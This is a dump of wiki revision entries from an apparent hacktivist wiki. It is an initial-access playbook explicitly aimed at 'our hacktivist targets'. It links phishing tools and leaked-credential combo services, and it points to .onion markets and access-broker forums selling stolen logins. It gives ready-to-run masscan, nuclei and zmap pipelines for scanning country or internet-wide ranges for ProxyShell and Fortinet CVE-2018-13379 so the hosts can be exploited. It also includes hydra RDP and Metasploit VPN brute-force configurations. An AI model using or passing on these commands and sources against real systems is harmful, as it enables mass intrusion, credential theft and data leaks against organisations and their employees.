# https://wordlists-cdn.assetnote.io/rawdata/kiterunner/routes-small.json.tar.gz&lt;br /&gt;
# https://wordlists-cdn.assetnote.io/data/kiterunner/routes-small.kite.tar.gz&lt;br /&gt;
# https://wordlists-cdn.assetnote.io/rawdata/kiterunner/swagger-files.tar&lt;br /&gt;
# https://wordlists-cdn.assetnote.io/data/kiterunner/swagger-wordlist.txt&lt;br /&gt;
Web API specific word lists:&lt;br /&gt;
* A list of 3203 common API endpoints and objects designed for fuzzing: https://gist.github.com/yassineaboukir/8e12adefbd505ef704674ad6ad48743d&lt;br /&gt;
* A wordlist of API names for web application assessments: https://github.com/chrislockard/api_wordlist&lt;br /&gt;
* A collection of API word lists: https://github.com/hAPI-hacker/Hacking-APIs&lt;br /&gt;
* GraphQL word list: https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/graphql.txt&lt;br /&gt;
&lt;br /&gt;
== Exploitation ==&lt;br /&gt;
Although API specific exploitation may require scripting or custom payloads to mass scrape data or exploit logic based vulnerabilities it&#039;s still worth knowing common payloads and exploit tools for web applications: https://enlacehacktivista.org/index.php?title=Exploitation&lt;/div&gt;</summary>
		<author><name>Booda</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures&amp;diff=1732</id>
		<title>Initial Access Tactics, techniques and procedures</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures&amp;diff=1732"/>
		<updated>2024-03-30T12:22:23Z</updated>

		<summary type="html">&lt;p&gt;Booda: /* Buying access */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Phishing ==&lt;br /&gt;
[https://www.frontiersin.org/articles/10.3389/fcomp.2021.563060/full Phishing] is the most common attack method favored by advanced persistent threat groups and cyber criminal organized gangs. This is because it relies on social engineering to trick the target to either download a malicious e-mail attachment or click on a malicious link.&lt;br /&gt;
&lt;br /&gt;
==== Tools ====&lt;br /&gt;
* https://0xboku.com/2021/07/12/ArtOfDeviceCodePhish.html&lt;br /&gt;
* https://medium.com/maltrak/com-objects-p-2-your-stealthy-fileless-attack-bf78318d9165&lt;br /&gt;
* https://infosecwriteups.com/recipe-for-a-successful-phishing-campaign-part-1-2-dc23d927ec55&lt;br /&gt;
* https://www.xanthus.io/mastering-the-simulated-phishing-attack&lt;br /&gt;
* https://github.com/Arno0x/EmbedInHTML&lt;br /&gt;
* https://github.com/L4bF0x/PhishingPretexts&lt;br /&gt;
* http://lockboxx.blogspot.com/2018/12/gophish-evilginx2-for-phishing.html&lt;br /&gt;
* https://book.hacktricks.xyz/phishing-methodology&lt;br /&gt;
* https://outflank.nl/blog/2020/03/30/mark-of-the-web-from-a-red-teams-perspective&lt;br /&gt;
* https://delta.navisec.io/a-pentesters-guide-part-4-grabbing-hashes-and-forging-external-footholds/&lt;br /&gt;
* https://www.rootshellsecurity.net/ntlm_theft-a-tool-for-file-based-forced-ntlm-hash-disclosure/&lt;br /&gt;
* https://getgophish.com/ Be sure to [https://www.sprocketsecurity.com/blog/never-had-a-bad-day-phishing-how-to-set-up-gophish-to-evade-security-controls remove the identifying headers gophish adds]&lt;br /&gt;
* https://github.com/curtbraz/PhishAPI&lt;br /&gt;
* https://github.com/edoverflow/can-i-take-over-xyz&lt;br /&gt;
* https://blog.sublimesecurity.com/red-team-techniques-gaining-access-on-an-external-engagement-through-spear-phishing/&lt;br /&gt;
* Phishing with GoPhish and DigitalOcean: https://www.ired.team/offensive-security/initial-access/phishing-with-gophish-and-digitalocean | [https://www.sprocketsecurity.com/blog/never-had-a-bad-day-phishing-how-to-set-up-gophish-to-evade-security-controls remove the identifying headers gophish adds]&lt;br /&gt;
* Phishing with MS Office: https://www.ired.team/offensive-security/initial-access/phishing-with-ms-office&lt;br /&gt;
&lt;br /&gt;
== Password Attacks ==&lt;br /&gt;
Groups like [https://www.microsoft.com/en-us/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/ Lapsus$] show&#039;s the world that you don&#039;t need to be a great technical hacker to pwn massive corporations and if common password and multi-factor authentication (MFA) attacks work on the likes of [https://en.wikipedia.org/wiki/Lapsus$ Uber, Rockstar games, Okta and so on] then they will work on our hacktivist targets!&lt;br /&gt;
&lt;br /&gt;
If your target uses multi-factor authentication you can try either [https://www.forbes.com/sites/daveywinder/2022/09/18/has-uber-been-hacked-company-investigates-cybersecurity-incident-as-law-enforcement-alerted social engineering] or MFA fatigue.&lt;br /&gt;
&lt;br /&gt;
=== Usernames ===&lt;br /&gt;
Create a bespoke username word list based on OSINT, recon, permutations and your targets employee LinkedIn, website and other social media profiles to aid in your password attacks to develop possible usernames and e-mails for password spraying.&lt;br /&gt;
&lt;br /&gt;
* https://github.com/digininja/CeWL&lt;br /&gt;
* https://github.com/Mebus/cupp&lt;br /&gt;
* https://github.com/digininja/RSMangler&lt;br /&gt;
* https://github.com/sc0tfree/mentalist&lt;br /&gt;
* https://github.com/urbanadventurer/username-anarchy&lt;br /&gt;
* https://github.com/vysecurity/LinkedInt&lt;br /&gt;
* https://github.com/initstring/linkedin2username&lt;br /&gt;
* https://github.com/shroudri/username_generator&lt;br /&gt;
&lt;br /&gt;
=== Passwords ===&lt;br /&gt;
Common and leaked credentials to test login portals and network services.&lt;br /&gt;
&lt;br /&gt;
==== Default passwords ====&lt;br /&gt;
* https://cirt.net/passwords&lt;br /&gt;
* https://default-password.info&lt;br /&gt;
* https://datarecovery.com/rd/default-passwords&lt;br /&gt;
* https://github.com/ihebski/DefaultCreds-cheat-sheet&lt;br /&gt;
&lt;br /&gt;
==== Common and leaked passwords ====&lt;br /&gt;
* https://wiki.skullsecurity.org/index.php?title=Passwords&lt;br /&gt;
* https://github.com/danielmiessler/SecLists/tree/master/Passwords&lt;br /&gt;
* https://github.com/danielmiessler/SecLists/tree/master/Passwords/Leaked-Databases&lt;br /&gt;
* https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt&lt;br /&gt;
* https://github.com/projectdiscovery/nuclei-templates/tree/main/helpers/wordlists&lt;br /&gt;
&lt;br /&gt;
=== Password cracking tools ===&lt;br /&gt;
&lt;br /&gt;
* https://github.com/byt3bl33d3r/SprayingToolkit&lt;br /&gt;
* https://www.kali.org/tools/hydra&lt;br /&gt;
* https://www.kali.org/tools/brutespray&lt;br /&gt;
* https://www.kali.org/tools/medusa&lt;br /&gt;
* https://www.kali.org/tools/patator&lt;br /&gt;
* https://github.com/1N3/BruteX&lt;br /&gt;
&lt;br /&gt;
=== Searching leaks ===&lt;br /&gt;
* https://github.com/khast3x/h8mail [Free but includes paid services]&lt;br /&gt;
&lt;br /&gt;
==== Services ====&lt;br /&gt;
&#039;&#039;&#039;Please note: DO NOT use intelx[.]io as they [https://web.archive.org/web/20230319045845/https://twitter.com/_IntelligenceX/status/1610302930069889024 have been seen doxing hackers] in the past and [https://web.archive.org/web/20230323031901/https://blog.intelx.io/2020/07/05/why-we-are-going-to-block-tor-ips block the use of Tor]. AVOID!&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
You can use services that compile COMBO lists (leaked credentials) to search for your targets domain, then download the results and use them in a password attack to see whether or not your target recycles their credentials.&lt;br /&gt;
&lt;br /&gt;
* https://haveibeenpwned.com&lt;br /&gt;
* https://exposed.lol&lt;br /&gt;
* https://leak-lookup.com [Paid. Accepts crypto (XMR &amp;amp; BTC)]&lt;br /&gt;
* https://dehashed.com [Paid. Accepts crypto (BTC)]&lt;br /&gt;
&lt;br /&gt;
Once your leaks have been downloaded you can [https://archive.ph/C8tI2 parse] your results in the format, e-mail:pass.&lt;br /&gt;
&lt;br /&gt;
=== Password spraying ===&lt;br /&gt;
Employees commonly use recycled and weak credentials for convenience. If you already have valid passwords you can try and spray them across different services to test whether they have been recycled on other services or not. You can also take common passwords [https://github.com/danielmiessler/SecLists/blob/master/Passwords/common_corporate_passwords.lst (Spring2023)] and spray them hoping an employee uses a weak and guessable credential.&lt;br /&gt;
 &lt;br /&gt;
* https://github.com/dafthack/MSOLSpray&lt;br /&gt;
* https://pentestlab.blog/2019/09/05/microsoft-exchange-password-spraying&lt;br /&gt;
* https://github.com/blacklanternsecurity/TREVORspray&lt;br /&gt;
* https://github.com/knavesec/CredMaster&lt;br /&gt;
* https://github.com/xFreed0m/RDPassSpray&lt;br /&gt;
* https://github.com/dafthack/MailSniper&lt;br /&gt;
&lt;br /&gt;
=== Hash cracking ===&lt;br /&gt;
[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Hash%20Cracking.md Crack password hashes] using both online and offline tools!&lt;br /&gt;
&lt;br /&gt;
==== Identify hash ====&lt;br /&gt;
* https://github.com/blackploit/hash-identifier&lt;br /&gt;
&lt;br /&gt;
==== Online tools ====&lt;br /&gt;
* https://hashes.com/en/decrypt/hash [Free &amp;amp; Paid]&lt;br /&gt;
* https://crackstation.net&lt;br /&gt;
&lt;br /&gt;
==== Offline tools ====&lt;br /&gt;
* https://github.com/hashcat/hashcat&lt;br /&gt;
* https://github.com/openwall/john&lt;br /&gt;
* https://github.com/NotSoSecure/password_cracking_rules&lt;br /&gt;
&lt;br /&gt;
== Buying access ==&lt;br /&gt;
&lt;br /&gt;
You can use the russian market to purchase credentials stolen from targets through the use of info stealer malware. Search your target here to see if you can make a quick win gaining access to an employee account. Any account that allows internal access is always a great start.&lt;br /&gt;
* http://flydedxmmddhgt3vfhv6om63ra2u2x4jxginulhxb6nzcnj3wwgavwyd.onion [Paid]&lt;br /&gt;
&lt;br /&gt;
You can also find access brokers selling network access inside of companies on forums. Services include but is not limited to account credentials, shells, implants, and other remote management software (RDP, VPN, SSH, etc).&lt;br /&gt;
&lt;br /&gt;
* https://xss.is ([http://xssforumv3isucukbxhdhwz67hoa5e2voakcfkuieq4ch257vsburuid.onion Tor])&lt;br /&gt;
* https://exploit.in [Paid] ([https://exploitivzcm5dawzhe6c32bbylyggbjvh5dyvsvb5lkuz5ptmunkmqd.onion Tor])&lt;br /&gt;
* https://ramp4u.io [Free &amp;amp; Paid] ([http://rampjcdlqvgkoz5oywutpo6ggl7g6tvddysustfl6qzhr5osr24xxqqd.onion Tor])&lt;br /&gt;
&lt;br /&gt;
== Spray and pray ==&lt;br /&gt;
As seen by [https://enlacehacktivista.org/hackback2.webm Guacamaya], hacktivists can benefit from a highly targeted spray and pray campaign whereby you scan IP ranges of countries of interest or your target companies IP ranges for critical vulnerabilities and attack protocols with a password attack. In the case of Guacamaya they scanned and exploited proxyshell and yoinked all their target e-mails out of their Microsoft exchange e-mail servers and leaked them. You can also do the same! See [https://enlacehacktivista.org/index.php?title=Scanning_and_Recon scanning and recon] for tools such as [https://github.com/projectdiscovery/nuclei nuclei] and the [https://nmap.org/book/nse.html nmap scripting engine] (NSE) to then vulnerability scan the IP addresses you discover.&lt;br /&gt;
&lt;br /&gt;
=== Prerequisites ===&lt;br /&gt;
There are some prerequisites you will need to follow the below examples:&lt;br /&gt;
# Virtual or Dedicated server ([https://enlacehacktivista.org/index.php?title=Opsec_Measures OPSEC])&lt;br /&gt;
# Basic [https://www.hackthebox.com/blog/learn-linux command line knowledge]&lt;br /&gt;
# Terminal multiplexers such as [https://github.com/tmux/tmux/wiki Tmux] or [https://www.gnu.org/software/screen/ Gnu/Screen] to maintain your scanning and hacking session&lt;br /&gt;
# Administration skills such as [https://www.redhat.com/sysadmin/eight-ways-secure-ssh SSH] and [https://www.ssh.com/academy/ssh/scp#basic-usage SCP].&lt;br /&gt;
&lt;br /&gt;
=== Networks ===&lt;br /&gt;
==== Vulnerability Scanning ====&lt;br /&gt;
We can use a vulnerability scanning spray and pray technique on [https://attack.mitre.org/techniques/T1190 publicly facing applications] to masscan the internet or specific IP ranges for critical vulnerabilities that we can later exploit and gain initial access into target networks with. Here we scan for and exploit both Proxyshell and CVE-2018-13379 as they are both high severity and critical CVE vulnerabilities. In your attacks focus on [https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-215a new] and [https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-117a old] CVE vulnerabilities that are commonly exploited.&lt;br /&gt;
&lt;br /&gt;
Here we port scan IP ranges for either the entire internet or specific country IP ranges, append those ports to the end of the IP address separated with a colon and then proceed to vulnerability scan the discovered hosts before finally exploiting the identified vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;IP Ranges&#039;&#039;&#039;:&lt;br /&gt;
* List of IP ranges from popular cloud providers: https://kaeferjaeger.gay/?dir=ip-ranges&lt;br /&gt;
* CIDR country-level IP data, straight from the Regional Internet Registries, updated hourly: https://github.com/herrbischoff/country-ip-blocks&lt;br /&gt;
* [https://github.com/robertdavidgraham/masscan#how-to-scan-the-entire-internet Scan the entire internet:] 0.0.0.0/0&lt;br /&gt;
&lt;br /&gt;
===== Proxyshell =====&lt;br /&gt;
&#039;&#039;&#039;Tool&#039;&#039;&#039;: [https://github.com/robertdavidgraham/masscan masscan]&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;1.&#039;&#039;&#039; Scan for [https://www.mandiant.com/resources/blog/pst-want-shell-proxyshell-exploiting-microsoft-exchange-servers Proxyshell]:&lt;br /&gt;
* &amp;lt;code&amp;gt;sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://github.com/herrbischoff/country-ip-blocks ranges.txt] --rate 50000 -p443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo &#039;[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+&#039; &amp;gt; results.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;sed -i &#039;s/$/:443/&#039; results.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
*&amp;lt;code&amp;gt;[https://github.com/projectdiscovery/nuclei nuclei] -l results.txt -t [https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-34473.yaml nuclei-templates/http/cves/2021/CVE-2021-34473.yaml] -o vulns.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Exploit Discovered hosts: [[Proxyshell]]&lt;br /&gt;
&lt;br /&gt;
===== CVE-2018-13379 =====&lt;br /&gt;
&#039;&#039;&#039;2.&#039;&#039;&#039; Scan for [https://www.ic3.gov/Media/News/2021/210402.pdf CVE-2018-13379]:&lt;br /&gt;
* &amp;lt;code&amp;gt;sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://github.com/herrbischoff/country-ip-blocks ranges.txt] --rate 50000 -p4443,10443,8443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] --output-format list --output-file results.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
* &amp;lt;code&amp;gt;awk &#039;{ print $4 &amp;quot;:&amp;quot; $3 }&#039; results.txt &amp;gt; final_results.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
* &amp;lt;code&amp;gt;[https://github.com/projectdiscovery/nuclei nuclei] -l final_results.txt -t [https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2018/CVE-2018-13379.yaml nuclei-templates/http/cves/2018/CVE-2018-13379.yaml] -o vulns.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
Exploit Discovered hosts: [[Fortinet SSL VPN Path Traversal]]&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Tool&#039;&#039;&#039;: [https://github.com/zmap/zmap zmap]&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;1.&#039;&#039;&#039; Scan for Microsoft Exchange E-mail Servers:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
sudo zmap -q -p 443 | httpx -silent -s -sd -location \&lt;br /&gt;
&amp;gt; | awk &#039;/owa/ { print substr($1,9) }&#039; &amp;gt; owa.txt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;2.&#039;&#039;&#039; Vulnerability scan discovered hosts for [[Proxyshell]] using [https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange-proxyshell.nse NSE] &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
nmap -p 443 -Pn -n \&lt;br /&gt;
&amp;gt; --script http-vuln-exchange-proxyshell.nse -iL owa.txt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[https://enlacehacktivista.org/hackback2.webm Exploit Discovered hosts]&lt;br /&gt;
&lt;br /&gt;
===== Domains =====&lt;br /&gt;
Mass subdomain enumerating, port scanning and vulnerability scanning domains at the start of an operation when targeting a country or specific TLDs (.gov) is a great way to get a lot of coverage and find low hanging fruit vulnerabilities which may serve as the initial access vector when hacking your targets.&lt;br /&gt;
&lt;br /&gt;
See [[Domain Spray and Pray]] scanning.&lt;br /&gt;
&lt;br /&gt;
==== Password Attacks ====&lt;br /&gt;
A lot of organizations use VPNs and RDPs to allow employees and third-party contractors to remotely connect into the internal network of the organization. For either developer, testing, lazy administration or forgotten about servers these systems can be left running with weak or default credentials with no multi-factor authentication in place. Port scan the internet for ports they commonly run on, cross referencing against Shodan for standard and non-standard ports then use common and default credentials.&lt;br /&gt;
&lt;br /&gt;
===== RDP =====&lt;br /&gt;
&#039;&#039;&#039;1.&#039;&#039;&#039; [https://github.com/galkan/crowbar Remote Desktop (RDP) Brute forcing]:&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
* &amp;lt;code&amp;gt;sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://enlacehacktivista.org/images/4/4b/Latin_american_ranges.txt ranges.txt] --rate 50000 -p3389 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo &#039;[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+&#039; &amp;gt; results.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
* &amp;lt;code&amp;gt;[https://github.com/vanhauser-thc/thc-hydra hydra] -L [https://github.com/danielmiessler/SecLists/tree/master/Usernames usernames.txt] -P [https://github.com/danielmiessler/SecLists/tree/master/Passwords passwords.txt] -M targets.txt -t 16 rdp -o results&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== VPN =====&lt;br /&gt;
&#039;&#039;&#039;2.&#039;&#039;&#039; Virtual Private Network (VPN) Brute forcing:&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
* &amp;lt;code&amp;gt;sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://enlacehacktivista.org/images/4/4b/Latin_american_ranges.txt ranges.txt] --rate 50000 -p10443,443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo &#039;[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+&#039; &amp;gt; results.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
* To brute-force see: https://enlacehacktivista.org/index.php?title=VPN_brute_forcing&lt;/div&gt;</summary>
		<author><name>Booda</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=VPN_brute_forcing&amp;diff=1731</id>
		<title>VPN brute forcing</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=VPN_brute_forcing&amp;diff=1731"/>
		<updated>2024-03-30T12:19:50Z</updated>

		<summary type="html">&lt;p&gt;Booda: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[https://www.rapid7.com/blog/post/2023/08/29/under-siege-rapid7-observed-exploitation-of-cisco-asa-ssl-vpns Brute force common corporate VPNs] to gain initial access to target networks. [https://enlacehacktivista.org/index.php?title=Exploitation#Metasploit Install metasploit] and then see [https://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures#Spray_and_pray Initial access TTPs for mass port scanning]. For this to work properly using a large username and password file will cause the module to stall for a very long time. To fix this issue use [https://github.com/projectdiscovery/nuclei-templates/blob/main/helpers/wordlists/wp-users.txt smaller user] and [https://github.com/projectdiscovery/nuclei-templates/blob/main/helpers/wordlists/wp-passwords.txt password] files.&lt;br /&gt;
&lt;br /&gt;
Word lists:&lt;br /&gt;
* https://enlacehacktivista.org/index.php/Initial_Access_Tactics,_techniques_and_procedures#Common_and_leaked_passwords&lt;br /&gt;
&lt;br /&gt;
== CISCO ==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
sudo systemctl start postgresql&lt;br /&gt;
msfdb init&lt;br /&gt;
&lt;br /&gt;
msfconsole&lt;br /&gt;
use auxiliary/scanner/http/cisco_ssl_vpn&lt;br /&gt;
set RHOSTS file:/home/targets_443.txt&lt;br /&gt;
set RPORT 443&lt;br /&gt;
set USER_FILE /home/users.txt&lt;br /&gt;
set PASS_FILE /home/pass.txt&lt;br /&gt;
set threads 10&lt;br /&gt;
run&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== FORTI SSL VPN ==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
sudo systemctl start postgresql&lt;br /&gt;
msfdb init&lt;br /&gt;
&lt;br /&gt;
msfconsole&lt;br /&gt;
use auxiliary/scanner/http/fortinet_ssl_vpn&lt;br /&gt;
set RHOSTS file:/home/targets_10443.txt&lt;br /&gt;
set RPORT 10443&lt;br /&gt;
set USER_FILE /home/users.txt&lt;br /&gt;
set PASS_FILE /home/pass.txt&lt;br /&gt;
set threads 10&lt;br /&gt;
run&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Booda</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures&amp;diff=1730</id>
		<title>Initial Access Tactics, techniques and procedures</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures&amp;diff=1730"/>
		<updated>2024-03-30T12:19:36Z</updated>

		<summary type="html">&lt;p&gt;Booda: /* Common and leaked passwords */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Phishing ==&lt;br /&gt;
[https://www.frontiersin.org/articles/10.3389/fcomp.2021.563060/full Phishing] is the most common attack method favored by advanced persistent threat groups and cyber criminal organized gangs. This is because it relies on social engineering to trick the target to either download a malicious e-mail attachment or click on a malicious link.&lt;br /&gt;
&lt;br /&gt;
==== Tools ====&lt;br /&gt;
* https://0xboku.com/2021/07/12/ArtOfDeviceCodePhish.html&lt;br /&gt;
* https://medium.com/maltrak/com-objects-p-2-your-stealthy-fileless-attack-bf78318d9165&lt;br /&gt;
* https://infosecwriteups.com/recipe-for-a-successful-phishing-campaign-part-1-2-dc23d927ec55&lt;br /&gt;
* https://www.xanthus.io/mastering-the-simulated-phishing-attack&lt;br /&gt;
* https://github.com/Arno0x/EmbedInHTML&lt;br /&gt;
* https://github.com/L4bF0x/PhishingPretexts&lt;br /&gt;
* http://lockboxx.blogspot.com/2018/12/gophish-evilginx2-for-phishing.html&lt;br /&gt;
* https://book.hacktricks.xyz/phishing-methodology&lt;br /&gt;
* https://outflank.nl/blog/2020/03/30/mark-of-the-web-from-a-red-teams-perspective&lt;br /&gt;
* https://delta.navisec.io/a-pentesters-guide-part-4-grabbing-hashes-and-forging-external-footholds/&lt;br /&gt;
* https://www.rootshellsecurity.net/ntlm_theft-a-tool-for-file-based-forced-ntlm-hash-disclosure/&lt;br /&gt;
* https://getgophish.com/ Be sure to [https://www.sprocketsecurity.com/blog/never-had-a-bad-day-phishing-how-to-set-up-gophish-to-evade-security-controls remove the identifying headers gophish adds]&lt;br /&gt;
* https://github.com/curtbraz/PhishAPI&lt;br /&gt;
* https://github.com/edoverflow/can-i-take-over-xyz&lt;br /&gt;
* https://blog.sublimesecurity.com/red-team-techniques-gaining-access-on-an-external-engagement-through-spear-phishing/&lt;br /&gt;
* Phishing with GoPhish and DigitalOcean: https://www.ired.team/offensive-security/initial-access/phishing-with-gophish-and-digitalocean | [https://www.sprocketsecurity.com/blog/never-had-a-bad-day-phishing-how-to-set-up-gophish-to-evade-security-controls remove the identifying headers gophish adds]&lt;br /&gt;
* Phishing with MS Office: https://www.ired.team/offensive-security/initial-access/phishing-with-ms-office&lt;br /&gt;
&lt;br /&gt;
== Password Attacks ==&lt;br /&gt;
Groups like [https://www.microsoft.com/en-us/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/ Lapsus$] show&#039;s the world that you don&#039;t need to be a great technical hacker to pwn massive corporations and if common password and multi-factor authentication (MFA) attacks work on the likes of [https://en.wikipedia.org/wiki/Lapsus$ Uber, Rockstar games, Okta and so on] then they will work on our hacktivist targets!&lt;br /&gt;
&lt;br /&gt;
If your target uses multi-factor authentication you can try either [https://www.forbes.com/sites/daveywinder/2022/09/18/has-uber-been-hacked-company-investigates-cybersecurity-incident-as-law-enforcement-alerted social engineering] or MFA fatigue.&lt;br /&gt;
&lt;br /&gt;
=== Usernames ===&lt;br /&gt;
Create a bespoke username word list based on OSINT, recon, permutations and your targets employee LinkedIn, website and other social media profiles to aid in your password attacks to develop possible usernames and e-mails for password spraying.&lt;br /&gt;
&lt;br /&gt;
* https://github.com/digininja/CeWL&lt;br /&gt;
* https://github.com/Mebus/cupp&lt;br /&gt;
* https://github.com/digininja/RSMangler&lt;br /&gt;
* https://github.com/sc0tfree/mentalist&lt;br /&gt;
* https://github.com/urbanadventurer/username-anarchy&lt;br /&gt;
* https://github.com/vysecurity/LinkedInt&lt;br /&gt;
* https://github.com/initstring/linkedin2username&lt;br /&gt;
* https://github.com/shroudri/username_generator&lt;br /&gt;
&lt;br /&gt;
=== Passwords ===&lt;br /&gt;
Common and leaked credentials to test login portals and network services.&lt;br /&gt;
&lt;br /&gt;
==== Default passwords ====&lt;br /&gt;
* https://cirt.net/passwords&lt;br /&gt;
* https://default-password.info&lt;br /&gt;
* https://datarecovery.com/rd/default-passwords&lt;br /&gt;
* https://github.com/ihebski/DefaultCreds-cheat-sheet&lt;br /&gt;
&lt;br /&gt;
==== Common and leaked passwords ====&lt;br /&gt;
* https://wiki.skullsecurity.org/index.php?title=Passwords&lt;br /&gt;
* https://github.com/danielmiessler/SecLists/tree/master/Passwords&lt;br /&gt;
* https://github.com/danielmiessler/SecLists/tree/master/Passwords/Leaked-Databases&lt;br /&gt;
* https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt&lt;br /&gt;
* https://github.com/projectdiscovery/nuclei-templates/tree/main/helpers/wordlists&lt;br /&gt;
&lt;br /&gt;
=== Password cracking tools ===&lt;br /&gt;
&lt;br /&gt;
* https://github.com/byt3bl33d3r/SprayingToolkit&lt;br /&gt;
* https://www.kali.org/tools/hydra&lt;br /&gt;
* https://www.kali.org/tools/brutespray&lt;br /&gt;
* https://www.kali.org/tools/medusa&lt;br /&gt;
* https://www.kali.org/tools/patator&lt;br /&gt;
* https://github.com/1N3/BruteX&lt;br /&gt;
&lt;br /&gt;
=== Searching leaks ===&lt;br /&gt;
* https://github.com/khast3x/h8mail [Free but includes paid services]&lt;br /&gt;
&lt;br /&gt;
==== Services ====&lt;br /&gt;
&#039;&#039;&#039;Please note: DO NOT use intelx[.]io as they [https://web.archive.org/web/20230319045845/https://twitter.com/_IntelligenceX/status/1610302930069889024 have been seen doxing hackers] in the past and [https://web.archive.org/web/20230323031901/https://blog.intelx.io/2020/07/05/why-we-are-going-to-block-tor-ips block the use of Tor]. AVOID!&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
You can use services that compile COMBO lists (leaked credentials) to search for your targets domain, then download the results and use them in a password attack to see whether or not your target recycles their credentials.&lt;br /&gt;
&lt;br /&gt;
* https://haveibeenpwned.com&lt;br /&gt;
* https://exposed.lol&lt;br /&gt;
* https://leak-lookup.com [Paid. Accepts crypto (XMR &amp;amp; BTC)]&lt;br /&gt;
* https://dehashed.com [Paid. Accepts crypto (BTC)]&lt;br /&gt;
&lt;br /&gt;
Once your leaks have been downloaded you can [https://archive.ph/C8tI2 parse] your results in the format, e-mail:pass.&lt;br /&gt;
&lt;br /&gt;
=== Password spraying ===&lt;br /&gt;
Employees commonly use recycled and weak credentials for convenience. If you already have valid passwords you can try and spray them across different services to test whether they have been recycled on other services or not. You can also take common passwords [https://github.com/danielmiessler/SecLists/blob/master/Passwords/common_corporate_passwords.lst (Spring2023)] and spray them hoping an employee uses a weak and guessable credential.&lt;br /&gt;
 &lt;br /&gt;
* https://github.com/dafthack/MSOLSpray&lt;br /&gt;
* https://pentestlab.blog/2019/09/05/microsoft-exchange-password-spraying&lt;br /&gt;
* https://github.com/blacklanternsecurity/TREVORspray&lt;br /&gt;
* https://github.com/knavesec/CredMaster&lt;br /&gt;
* https://github.com/xFreed0m/RDPassSpray&lt;br /&gt;
* https://github.com/dafthack/MailSniper&lt;br /&gt;
&lt;br /&gt;
=== Hash cracking ===&lt;br /&gt;
[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Hash%20Cracking.md Crack password hashes] using both online and offline tools!&lt;br /&gt;
&lt;br /&gt;
==== Identify hash ====&lt;br /&gt;
* https://github.com/blackploit/hash-identifier&lt;br /&gt;
&lt;br /&gt;
==== Online tools ====&lt;br /&gt;
* https://hashes.com/en/decrypt/hash [Free &amp;amp; Paid]&lt;br /&gt;
* https://crackstation.net&lt;br /&gt;
&lt;br /&gt;
==== Offline tools ====&lt;br /&gt;
* https://github.com/hashcat/hashcat&lt;br /&gt;
